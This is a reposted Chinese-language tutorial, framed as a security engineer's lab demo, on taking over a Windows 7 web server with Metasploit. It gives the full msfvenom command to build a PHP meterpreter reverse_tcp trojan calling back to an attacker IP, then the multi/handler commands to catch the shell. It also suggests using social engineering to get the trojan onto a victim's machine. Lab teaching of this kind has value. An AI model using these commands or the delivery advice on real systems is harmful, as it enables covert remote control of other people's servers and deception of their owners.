网站服务器(网络安全工程师演示)

一、背景介绍Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木马控制受害者主机呢?接下来让我们一起学习!二、资源装备1.安装好 Win7的虚拟机一台2.整装待发的小白一个。3.安装好的Kali Linux虚拟机一台。三、攻防实战3.1 将受害者主机(Windows7)跟攻击者主机(Kali Linux)的网络模式全部设置为NAT模式,如下图所示。步骤:打开虚拟机的设置/选择网络适配器/选择NAT模式。3.2 查看实验的两台主机的IP地址,如下图所示。命令:ifconfig3.3 利用“msfvenom”木马生成工具生成对应的木马文件,如下图所示。步骤1:msfvenom工具的参数介绍-p, –payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的-o, –out < path> 指定创建好的payload的存放位置。-h, –help 查看帮助选项。步骤2:利用msfvenom工具生成对应的木马文件,如下图所示。命令:msfvenom -p 指定需要使用的payload(攻击荷载) lhost=攻击者主机IP -f exe > 生成木马文件的保存位置例子:msfVenom -p php/meterpreter/reverse_tcp lhost=192.168.78.168 lport=4444 -r raw > /root/hack.php步骤3:在已知的木马文件保存路径目录下查找对应的木马文件是否已经生成,如下图所示,木马文件已经存在(这里使用图形化文件管理系统来查看,你也可以利用ls命令查看对应路径下面是否已经生成对应的木马文件)。3.4 利用一定的社会工程学方法将生成的木马文件发送到目标受害者主机,并且在受害者主机进行运行(对应的社会工程学知识请持续关注本号,后续讲解),如下图所示。3.5 安装“phpstudy集成环境”,如下图所示。步骤1:打开“phpstudy”官网选择与你电脑系统相对应的软件版本下载。步骤2:安装注意事项1. 安装路径不能包含“中文”或者“空格”,否则会报错(例如错误提示:Can't change dir to 'G:\\x65b0\x5efa\x6587\)2. 保证安装路径是纯净的,安装路径下不能有已安装的V8版本,若重新安装,请选择其它路径步骤3:phpstudy官方使用教程,需者自取。网址:https://www.php.cn/course/1066.html3.6 安装好对应的软件后,启动phpstudy中的环境,如下图所示。步骤1:点击相应的环境旁边的启动按钮启动即可。步骤2:进入apache服务,如下图所示。3.7 将对应的木马文件上传到apache服务的www目录下,如下图所示。3.8 启动Metasploit(msf)渗透框架,如下图所示。命令1:msfconsole命令2:use exploit/multi/handler命令3:set payload php/meterpreter/reverse_tcp命令4:show options命令5:set lhost 192.168.78.168命令6:run(启动攻击模块)3.9 拿到目标主机服务器的shell,如下图所示。命令:shell进入shell页面。

本文出自快速备案,转载时请注明出处及相应链接。

本文永久链接: https://www.175ku.com/29744.html